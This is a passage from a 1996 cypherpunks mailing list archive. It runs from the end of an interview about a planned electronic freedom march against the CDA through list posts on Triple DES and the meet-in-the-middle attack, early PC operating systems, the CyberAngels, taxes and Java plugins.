    to insure we can get a place...

    CFA: Where will the speakers be at, if you know? I mean
    human speakers :)

    Keith G: That depends on where we can locate. Since I'm
    trying to combine it with some congressional lobbying,
    I'd LIKE it to be on the west stairs of the Capitol. But
    the Ellipse, which we had reserved for the original
    date, would put us in shouting distance of the White
    House...

    CFA: *nod*

    Keith G: Of course, this thing has grown beyond JUST the
    CDA. In my opinion, it'll be wastepaper by mid-June. . .
    but we have to fight for crypto rights, and the
    ill-informed types who foisted the CDA on us will be
    back next year. This isn't just one battle... this is
    the start of a whole new political front.

    CFA: You're going to involve crypto issues?

    Keith G: Free speech is free speech. If they ban crypto,
    then they'd better make damned sure that envelopes are
    banned, too. Encrypted or clear, free speech is an
    absolute.

    CFA: *nod*

    Keith G: We also need to let the Congress know a few
    things about the Net: according to a pal of mine at CDT,
    your average Net user makes over $40K, and votes
    SIGNIFICANTLY more than not-Net-users. We have money, we
    have votes... it's time to turn that into power.

    CFA: So, you're in charge of the whole shebang now?

    Keith G: Yep. John Wash, who started this, got way too
    bogged down in work, realized it, and handed it off to
    me last Monday, April 15th...

    CFA: For those who missed your announcement, why the new
    date?

    Keith G: Well, to be honest, when I looked at what we
    had set up, AND what the Park Service required of us
    (i.e. portatpotties, medics, security), I saw we needed
    a LOT more money and organization than was possible for
    a bunch of part-time activists to get in the time
    remaining. Secondly, the CDA trial is going FAR faster
    than anything we had expected: the verdict will be out
    by mid-June, and from all reports, the Feds have been
    unusually incompetent in their arguments. So, I thought
    we should move as close as we can to the election, to
    (1) maximize our power, politically, (2) get a MUCH
    better organization in place, and (3) get out of the
    summer DC sun. This place is AWFUL in the summer... ;)

    CFA: :)

    Keith G: We need to let the Congress know that the Net
    is NOT all porno fiends, militia types exchanging bomb
    recipes, and all the other net.myths that seem to abound
    on Capitol Hill. Also, I'd like to work towards a
    declaration by Congresscritters that Email will be taken
    just as seriously as snailmail. Right now, most of the
    time your Congressional Email gets answered by a Bot...
    and that's the end of it. My friends on the Hill tell me
    they read email when all else is done...

    CFA: What about folks who can't make it to DC? Are you
    encouraging local events?

    Keith G: Locally, we'd LIKE to get all the people who
    CAN'T make it, visit their local Congressman and
    Senators offices' on the Friday before, or Monday after.
    And lobby, in person...

    CFA: Right.

    Keith G: I've gotten word today of a possible parallel
    EFM in Seattle. If we can get simultaneous marches in
    several cities, that'd be great.

    CFA: What can people do to help? It sounds like there's
    a lot of work to be done.

    Keith G: What do we need?? I've got webmasters,
    organizers, publicity types: I need a financial type,
    and some fund-raisers. We also need sponsors. We have
    NONE. We've been given a lot of "Sure we'll support
    you," but when we ask for $$, all of a sudden it gets
    real quiet.

    CFA: *nod* Have you had any reports of folks raising
    funds on the local level?

    Keith G: Not as yet. We're attempting to formalize a
    relationship with an existing non-profit, to use as a
    tax-deductible funding vehicle. We're also looking at
    selling T-shirts, and I've been approached with several
    business offers...

    CFA: Would you encourage local fund-raising for the
    March? 

    Keith G: Absolutely. 

    CFA: How did you get involved in net.activism?

    Keith G: How?? I went to the February 10th protest in
    Lafayette Park (behind the White House) that Tom Edwards
    put on. My first protest. The rest, well, it just sort
    of happened...

    CFA: :) The Feb. 10 protest was about the CDA?

    Keith G: Yep. Clinton signed it on Black Thursday, the
    8th of February. Tom started the whole thing a few days
    earlier, and we got several hundred to turn out on
    fairly short notice.

    CFA: Are there other things that I, as an average net
    guy, can do to help?

    Keith G: Average net.guy... hmm... Well, when we get set
    up, buy a T-shirt, wear it to your Congresscritter's
    office. Also one or two particularly crafty ideas that
    I'm working on, but not ready to unveil yet (legal,
    non-violent, but potentially VERY politically
    effective...)

    CFA: Okay :) Keep us posted.

    Keith G: Oh, it will be on the web site... which I'm
    getting re-written... HTML 3.0, frames, Java,
    hot-and-cold running ASCII. <g>

    CFA: What's the turnout projected for the March?

    Keith G: Honestly, I don't know. **MY** original
    projections for the June rally were between 1 and 10K:
    John Wash kept saying 20K. If we can set up an
    organization of college students during the summer and
    have them recruit aggressively when school starts, we
    could hit 20K. We're also organizing amongst other
    communities that are more heavily wired than most: my
    first appointments were a Gay/Lesbian/Bi coordinator...
    I hope to get some help from the Pagan community as
    well... I already have plenty of hookups in Fandom...

    CFA: Cool :) Getting the word out seems very important
    now, with the changes...

    Keith G: Exactly. The Web site is among the top 5% hit,
    I have done my best to get the word out without overly
    spamming USENET. I know I'm going to about 15 or so
    lists...

    CFA: Jon Lebkowsky said you're doing the Club Wired EF
    forum? May 30?

    Keith G: Yep. Jon and I finalized that yesterday.

    CFA: Great.

    Keith G: Now, to beat that darned cyber-stagefright <g>

    CFA: :) What about multimedia stuff? Are there plans for
    video and/or audio from the March?

    Keith G: We're talking with NetRadio about a simulcast,
    one gent also is looking into a video feed, on the level
    of the Fish-cam.

    CFA: What about the roster of speakers? Any changes?

    Keith G: Not as yet.... but we're trying to get some
    bigger names. If anyone has an, ER, PIPELINE to Bill
    Gates or Mark Andreessen of Netscape, I'd be glad to
    chat. I'd like to get Barlow of EFF, maybe even Newt...

    CFA: Yes, a politician would be good. Maybe Leahy...

    Keith G: Leahy comes to mind. NOT Gore... unless we
    could boo him offstage...

    CFA: Heh.

    Keith G: I am NOT pleased with the two-facedness of the
    politicos over this whole thing... ESPECIALLY Clinton's,
    "It's unconstitutional but..." followed by his letter to
    Exon. Even if I WASN'T Republican, I couldn't vote for
    Clinton/Gore due to their utter fecklessness over the
    CDA

    CFA: The letter to Exon had me fuming, too. I'm getting
    tired of settling for the lesser evil...

    Keith G: Right: vote for the GREATER evil... dread
    Chthulu in 96 !!! <g>

    CFA: :) Well, anything else you want to add before I let
    you get some rest?

    Keith G: Nothing I can think of... our website is
    http://www.efm.org, and I'll post announcements to
    alt.censorship, comp.org.eff.talk, alt.activism,
    alt.wired, at minimum.

    CFA: Okay. Thanks for coming to talk :)

    Keith G: Anytime...


    ---


    rich burroughs <richieb@teleport.com>
    (april 26, 1996)




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYgTA4T0GKfZRA/9AQH8OwP+NjWJAuYHWRbMdDCVt6Wj6Nh3ZxJIj0lU
DUXM8eJKEzI/CdOVGCUHYB7w3cQlCT6q1oNgiuiMGrWsd66WLR12Xmm/Zx1/pme4
egB5SB4Wuc96ZJ89q2qwuHG8V9FBzD2HJxFYLdHdadWMNpj5cM/DV1G1vCvFREz1
cSA5AsbCnuI=
=SXzn
-----END PGP SIGNATURE-----
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 2 May 1996 11:07:34 +0800
To: stevenw@best.com (Steven Weller)
Subject: If the Net were an industrial city... (nee: Freedom and security)
In-Reply-To: <v01540b00adad237d5dd2@[206.86.1.35]>
Message-ID: <199605011811.UAA21763@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself Steven Weller <stevenw@best.com>
 is alleged to have written:
> 
> >Jim Ray wrote


No he didn't.  It was CyberAngler (motto: "Trolling For 
Libertarian Cypherpunks Since Mid-April") that wrote that.
Attributions are important-- try not to mess them up again.


(> > == CyberAngler)
(> == Steven Weller)


> >The Internet is beyond the stage of small communities exercising informal
> >social controls (peer pressure).
> 
> How so?


We aren't convincing him to shut up just by telling him that
we've heard his statist spiel before, are we?  His point
exactly!  He is trying to tell us that peer pressure isn't 
working to shut obnoxious people like him up, so stronger 
measures are needed.


> >It's now a major industrial city and will
> 
> It's industry being?


It's a service industry.  An information service industry.  
Journalists, phone-sex whores, business consultants, 
bankers, brokers and barkers are moving into town, setting 
up their virtual shops, and catering to the hordes of 
readers, sightseers, sex-seekers, game-players, businessmen,
professionals and amateurs of all stripes that are pouring 
into town in wave after wave.


Granted most of these virtual shops consist of a single
ticket-taker's booth and a 10-meter tall neon facade.  
Granted that the shops occasionally collapse on visitors,
that there are no streets, that you can't tell the sellers
from the buyers and that few people are able to accept 
cash.


Still, it's a service industry.




more later,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYepE0jbHy8sKZitAQHkqQL+KNFMjTq7GVkySNQ8nxSIeHkRA1wfYDwA
G/rWdYK3jZ56QbHqScIxMp8oag7Ur8btthmQe5BhMI/hGQLBdXokJ2Mhw69PM1dJ
nIVQ4Zne5d82d+h3Y5bUlVyD3qTT1BR1
=CElr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 2 May 1996 14:53:57 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Freedom and security[noise]
Message-ID: <199605020023.UAA19294@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Uni wrote:

>On Wed, 1 May 1996, Steven Weller wrote:
>
>> >Jim Ray wrote
>> 
[...]

>Watch your attributation, Jim Ray did not write this.
>

Now three people, counting me, have corrected him.

I feel flattered knowing folks are actually watching
what I say so careully. If I'd only known, I would have
kept my mouth shut. I had a typospasm earlier today
during my pre-coffee jury-nullification rant this AM,
so I guess I should also try harder to do my best
to take care before hitting the ol' button.

Regards, Jim Ray <liberty@gate.net> 

"The FAA, FBI, Customs, CIA, Justice, DEA and the IRS were all involved
 in Mena. They won't say how they were involved, but they will tell you
 there is nothing there." -- Bill Plante, CBS News Correspondent, &
 Michael Singer, Producer, CBS News, New York. in Tuesday, May 3,
 1994's  Wall Street Journal letters to the editor section.
 
 [OK, OK, I know, we aren't Menapunks!] :)
JMR
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMYgACm1lp8bpvW01AQF/SQQAivRbyRfl6mMwq73voOfCX+BrQhGEQU6l
ZHozejbwpYlWYxJsb/ncFSi5S5DZM7LjpVcY88QFRbGnGRZP1FmaWaktmBSGA/4d
XJ8Cr9tnXxlWuvt6j0Gx840NwV5WIGoY88Z+UFyz2RTFYceLqVg4zuiouOri/WEs
17EwaQZcxKE=
=RnJd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 2 May 1996 19:29:42 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: [LONG] Churchill Club: 20th Anniversary PK Crypto
In-Reply-To: <199605011826.LAA12717@netcom8.netcom.com>
Message-ID: <v03006710adadddec456d@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713573.multipart/signed"

--Boundary..3941.1071713573.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

At 11:29 am  -0700 5/1/96, Bill Frantz wrote:
>At  4:14 AM 5/1/96 -0700, Dave Del Torto wrote:
>>Nice summary, Bill. Now I don't have to do it. ;) I hope this is OK with
>>you...
>>
>> <http://www.well.com/user/ddt/crypto/pkc-daddies.html>
>>
>
>Nice web page.  I should have added to the post that people should feel
>free to re-post within the bounds of good netiquette.

V2 now includes your comprehensive notes in HTML. :)

   dave



--Boundary..3941.1071713573.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
Q29tbWVudDogVmVyYnVtIHNhcGllbnRpIHNhdGlzIGVzdC4KCmlRQ1ZBd1VB
TVloU2FhSEJPRjlLcndEbEFRRnNvd1FBanFaTHhoeGVUU0wybXJhVk9MUmFM
R1ZSZVM1VzJMUVoKRmgvZ3NZUXp4OGJiamh1TTl1NjZyeXRRaFVBRmNHdXQ2
K0VqVXc1QXhYQlZGKzVPN0NTc3NIa0EwQ2Z2akNCYgorZUt1eUp0TzRWa3hn
c3Q2b3NYTmVFb0g5K0oyR0FVYyt1MVpjYnp1ck96TUxGMVNmcnVKcld4R1pj
Z3lYMFNZCmc1b2tZWXFhRmlNPQo9OWM2eQotLS0tLUVORCBQR1AgU0lHTkFU
VVJFLS0tLS0K
--Boundary..3941.1071713573.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Thu, 2 May 1996 18:02:24 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <199605011919.MAA27020@netcom8.netcom.com>
Message-ID: <3188382C.9778B7@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos wrote:
> 
> frantz@netcom.com (Bill Frantz) writes:
> 
>  > Most cryptographic experts recommend Triple DES, encrypting
>  > the data 3 times with 3 different keys.
> 
> It's actually encrypted three times with two keys comprising
> 112 bits of keyspace, using a decrypt on one key sandwiched
> between two encrypts using the other.  This prevents a "man
> in the middle" attack, which would be possible if only two
> DES encryptions were used, one for each key.

   Not quite.

   Double DES is subject to a "meet in the middle" attack (not a "man in
the middle"). Here's how it works:

   Let's say you've got unlimited storage, and you're doing a known
plaintext attack, so you've got both the ciphertext and the plaintext in
your hand. Then, just do all 2^56 decryptions of the ciphertext, and all
2^56 encryptions of the plaintext. Then, compare the two lists to see if
you've got a match. Since it's DES, you can save a factor of two in both
time and space, because it's got the complementation property.
   Assuming unlimited storage, three keys (168 bits) are equivalent to
two. However, since 2^55 is a lot of disk space, in practice a real
attacker will trade off space for time (it can be done). Thus, using
three keys is more work for the attacker than using two. So, modern
cryptographic usage is exactly as Bill said - three keys, three
encryptions. For example, S/MIME recommends the use of DES-EDE3-CBC (the
middle encryption is technically a decryption, although it doesn't
really make any difference).

   Glad I could be of service.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 2 May 1996 15:18:03 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: The Joy of Java
In-Reply-To: <Os7hx8m9L8GB085yn@netcom.com>
Message-ID: <5y40mD297w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


(No cryptorelevance, but neither is anything else on this list anymore)

abostick@netcom.com (Alan Bostick) writes:
> > to portability...what the world might have looked like for the past 15
> > years has the UCSD p-system succeeded instead of MS-DOS)
>
> What a horrifying thought!  UCSD p-system actually made MS-DOS look good.

My recollection is that when IBM first started selling IBM PC, they offered
a choice of (at least) 3 operating systems right from the start: UCSD p-system,
CP/M-86 or PC-DOS.  IBM didn't do anything to prompte PC-DOS over the other
two. It won fair and square in the marketplace because the other two were
even worse crap. (Later versions of CP/M-86 got much better.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 2 May 1996 18:13:44 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
In-Reply-To: <5y40mD297w165w@bwalk.dm.com>
Message-ID: <199605020542.WAA17712@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> My recollection is that when IBM first started selling IBM PC, they offered
> a choice of (at least) 3 operating systems right from the start: UCSD p-system,
> CP/M-86 or PC-DOS.  IBM didn't do anything to prompte PC-DOS over the other
> two. It won fair and square in the marketplace because the other two were
> even worse crap. (Later versions of CP/M-86 got much better.)

When the first IBM PC came out, I ran QNX on it, a Unix clone from a
company called "Quantum."  It did full pre-emptive multitasking, had 
a nice C compiler, and shared code between tasks, all on a little 8088
with two floppies and no hard drive and 768k of ram. 

We even had "talk", and I could chat with people who dialed the modem
I had hooked to my serial port, and they could log in and do work on 
my system at the same time I did.  

When MS-DOS first appeared, the quantum people kindly provided DOS 
emulation for QNX and I could simply type "DOS", and read DOS disks and
run DOS programs.  

Ultimately, however, as new and "improved" versions of DOS appeared, with
obtuse features, and almost every app using them, I finally 
bowed to the march of progress and installed DOS 3.1 on my system.

A giant leap backwards into the dark ages. 

QNX is still around, by the way, and I believe its primary market
is now embedded real-time systems, where its highly responsive and
optimized kernel can be exploited. 

Whenever I think of how nice QNX was, I recall Bill Gates' comment
about the true power in the software industry being not technical
excellence, but being big and strong enough to set industry-wide
standards and enforce them by fiat.

It's now over 10 years later, and DOS still can't multitask.  Obviously
there's no accounting for taste.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 2 May 1996 18:11:28 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: The Joy of Java
In-Reply-To: <5y40mD297w165w@bwalk.dm.com>
Message-ID: <960501.232814.1p1.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, dlv@bwalk.dm.com writes:

> (No cryptorelevance, but neither is anything else on this list anymore)

(but then, some of us have no life... )

> My recollection is that when IBM first started selling IBM PC, they
> offered a choice of (at least) 3 operating systems right from the
> start: UCSD p-system, CP/M-86 or PC-DOS. IBM didn't do anything
> to prompte PC-DOS over the other two. It won fair and square in
> the marketplace because the other two were even worse crap. (Later
> versions of CP/M-86 got much better.)

Also remember that UCSD P-system was around $800 and CP/M-86 was over
$100, while PC-DOS was somewhere under $50.  This was the early-mid
80's, and the dealer had just hit the purchaser for $1200-$1500 for the
computer with _no_ OS included.  It's no surprise that the least
expensive OS won.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYg6vhvikii9febJAQFIYwQAhf/NINh9Qmdc2Et9gflbwg8Lg38e7FJQ
znkK43Qz2ySYgPy6l9lkNeJqP0kCjAiObhLI8BWM88BU9/Q64Kp99qhoEnbZmxfy
ezAmRpNNeviro+Cj0wvGElbwo7UQ3q8347BuWaOjXCTE5zyELifZPGONTd019oz1
NrmWo8Y9P10=
=K9m8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 2 May 1996 16:24:08 +0800
To: unicorn@schloss.li>
Subject: Re: Freedom and security
In-Reply-To: <Pine.SUN.3.93.960501041802.614e-100000@polaris.mindport.net>
Message-ID: <4lW2rCG00YUz0veFAs@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 1-May-96 Re: Freedom and security 
by Black Unicorn@schloss.li 
>  
> Readers will note a familiar tactic.  "Parade of horrors."  The advocate
> will pass a series of examples intended to shock and frighten the reader
> into accepting the next convenient solution to these problems, which is
> coincidently provided by the advocate.

The parade of horrors, aka the four (or more) horsemen of the
infocalypse, is a common fear tactic used by those who would to restrict
our liberties. The family values groups employed this to great effect
during the CDA debate.

And as Jim Ray noted, talk is cheap. While the CyberAngels may claim to
be against the CDA, the cynic in me says they have to be against it --
even fewer people would take them seriously if they were for it.

But I don't recall them doing any _campaiging_ against it.

In fact, riding in on those horsemen is a central part of their
strategy. After all, if pedophiles/terrorists/child pornographers didn't
exist, no need for the CyberAngels, hmm?

-Declan

PS: Eric Freedman of Hofstra Law School has a wonderful article in an
upcoming Iowa Law Review about the death of the "obscenity" standard. I
think a similar argument can be applied to child porn.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 2 May 1996 16:34:59 +0800
To: wfrench@interport.net>
Subject: Re: Lolitas and Cyber Angels
In-Reply-To: <199605010716.DAA12911@interport.net>
Message-ID: <MlW2saO00YUzIveG1u@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 1-May-96 Re: Lolitas and Cyber
Angels by Will French@interport.ne 
>   However, that doesn't mean I would want them criminalized for
> it.  In fact, my "anyone possessing a copy" above includes the
> Government (and third parties such as the Guardian Angels) in
> the course of a kiddie-porn investigation/prosecution.  It's a
> very hard question.
>  
>   And yes, people who download Simpson crime scene photos are
> exploiting (not killing) Nicole and Ron.  When I have been shown
> these photos, I have quickly averted my eyes. This is simple
> human decency, not to mention respect for the dead.

Yep, criminalize the act, not a photo of it.

While it may be impolite to look at photos of Nicole and Ron, we
shouldn't criminalize the mere possession of them.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 2 May 1996 17:24:47 +0800
To: ml3e+@andrew.cmu.edu>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.3.89.9604281554.A30287-0100000@tesla.cc.uottawa.ca>
Message-ID: <4lW2t9G00YUz8veH1d@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 1-May-96 Re: CryptoAnarchy: What's
w.. by Michael Loomis@andrew.cm 
> "Tax Collector Want to Be for the Welfare State"

I can confirm this. Michael and I have had many an argument about taxes.
I tend to approach the argument from a libertarian perspective.

He, on the other hand, thinks the current tax setup is just about right,
and is a fan of the IRS.

Not kidding,

Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 2 May 1996 20:08:25 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <3188382C.9778B7@cs.berkeley.edu>
Message-ID: <199605020644.XAA23770@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien writes:

> Double DES is subject to a "meet in the middle" attack (not a "man in
> the middle"). 

Yes, a silly mistake on my part, which shows I should proofread even
the little messages before posting them. :)

Gleeful readers are filling my mailbox hoping to be the first to point
out this unfortunate error. 

> Thus, using
> three keys is more work for the attacker than using two. So, modern
> cryptographic usage is exactly as Bill said - three keys, three
> encryptions. For example, S/MIME recommends the use of DES-EDE3-CBC (the
> middle encryption is technically a decryption, although it doesn't
> really make any difference).

S/MIME aside, I was under the impression that the term "Triple-DES"
referred to the encrypt-decrypt-encrypt operation using two 
distinct keys, proposed by some for adoption as the successor to 
single DES. 

Has this usage now changed in favor of the three key version?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Thu, 2 May 1996 20:57:25 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: The Joy of Java
In-Reply-To: <5y40mD297w165w@bwalk.dm.com>
Message-ID: <m2afzr5yl0.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Dimitri" == Dimitri Vulis <dlv@bwalk.dm.com> writes:

Dimitri> (No cryptorelevance, but neither is anything else on this
Dimitri> list anymore)

Ditto.  I've tried to apply some Java relevance though.

Dimitri> abostick@netcom.com (Alan Bostick) writes:
>> > to portability...what the world might have looked like for the past 15
>> > years has the UCSD p-system succeeded instead of MS-DOS)

>> What a horrifying thought!  UCSD p-system actually made MS-DOS look good.

Dimitri> My recollection is that when IBM first started selling IBM
Dimitri> PC, they offered a choice of (at least) 3 operating systems
Dimitri> right from the start: UCSD p-system, CP/M-86 or PC-DOS.  IBM
Dimitri> didn't do anything to prompte PC-DOS over the other two. It
Dimitri> won fair and square in the marketplace because the other two
Dimitri> were even worse crap. (Later versions of CP/M-86 got much
Dimitri> better.)

This is half incorrect.  PC DOS was released with a lead time of about
9 months prior to the release of the other O/Ses.  This was enough to
give it a market share it has never looked back on.  There was plenty
of speculation in PC Magazine and Byte that this was *exactly* what
IBM intended all along.  It helped that the alternatives were
delivered as virtual cripples with no support software as well.

The P-System released for IBM PCs was less functional than the Apple
][ version that ran on 64 or 128k with bank switching, even by the
time of DOS 2.0.  About the only application it ever really had was
Context MBA which was quickly overtaken by Lotus 1-2-3 & company.

I wrote three disk device drivers for the Apple ][ UCSD P-System based
on documentation of dubious origin, and hated every second of it.
Much of the interface was hidden, and (on a 6502 remember) reserved
all of the precious 0 page for its own use.  It was a half-interesting
idea, but definitely in the same class with PC-DOS -- How Not to Write
an Operating System.

The Java relevance would be that given the current lead in marketing
Sun has, even if a technically superior solution arose right now, it
might have enough of a disadvantage in lead to never catch up and
become popular.  Technically superior products don't always win, look
at MS DOS/Windows/NT/95 and VMS, albeit from opposite ends of the
technical superiority spectrum.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peng-chiew low <pclow@pc.jaring.my>
Date: Thu, 2 May 1996 08:50:52 +0800
To: "Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <9605011318.AA09424@spirit.aud.alcatel.com>
Message-ID: <31879DD8.3479@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Daniel R. Oelke wrote:
> There are provisions for exporting DES for banking purposes.
> Generally it is a hardware card that "can't" be reused outside
> of the banking transfer machine. 

So far, I've seen DES software from a couple of U.S. companies. The question
is "Is it the U.S. domestic DES or "export flavored" DES? As for the hardware,
would'nt it be inconsistant if the DES supplied is the Domestic DES?

I know DES as a subject here is one big YAWN, but for guys like us in the
Asia, it's not. Why? 'Cause the US crypto companies here in Asia keep telling 
us about how good and wonderful and secure DES is, and that it is THE standard
used by the American Banking Association. 
 
> On 128-bit DH - No-where near big enough.I would appreciate if someone can email me details about the strenght of DH;
whether it's been broken, URLs..ect...

Thanks.

_______________________________________________________________
" You can fool some people all the time......"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 2 May 1996 18:08:14 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <4lW2t9G00YUz8veH1d@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.93.960502012945.614A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 May 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 1-May-96 Re: CryptoAnarchy: What's
> w.. by Michael Loomis@andrew.cm 
> > "Tax Collector Want to Be for the Welfare State"
> 
> I can confirm this. Michael and I have had many an argument about taxes.
> I tend to approach the argument from a libertarian perspective.
> 
> He, on the other hand, thinks the current tax setup is just about right,
> and is a fan of the IRS.

I must assume either

1) He is not intimately familiar with the system of U.S. taxation (even if
he is pro-high-tax, calling the current system 'just about right' is
folly).

2) He believes it important to have a confusing and inefficent tax system
for some other reason.

I always tell people who feel tax avoidance is "bad" and that using the
rules to minimize your tax exposure is a bad thing that I can easily
structure their finances such that 90% of their net income goes to the
IRS every year and still not break any rules.

> Not kidding,
> 
> Declan

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 2 May 1996 22:53:15 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <3185E5B6.3EE8@netscape.com>
Message-ID: <31887DD0.300F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <3187209C.3E5B@netscape.com>,
> Jeff Weinstein  <jsw@netscape.com> wrote:
> >
> >  It might be interesting to make a small plugin that just does some core
> >stuff like gathering entropy, mod-exp, and related stuff difficult or too
> >slow in java.  I mainly brought it up because people were asking about
> >calling native code from java.
> >
> In an alternate universe in which I didn't have projects to finish, I may
> be interested in doing something like this.  However, I haven't been able
> to find information on how to write Unix (or preferably portable) plugins.
> 
> Any hints?

  You can get the unix plugin SDK from ftp://ftp20.netscape.com/sdk/unix/

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an572010@anon.penet.fi (Skipjack Sally)
Date: Thu, 2 May 1996 23:12:39 +0800
To: cypherpunks@toad.com
Subject: aufweidersehn, * grave$
Message-ID: <9605020805.AB15301@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Glad that lying anti-racist jerk is leaving.  With all his/her's 
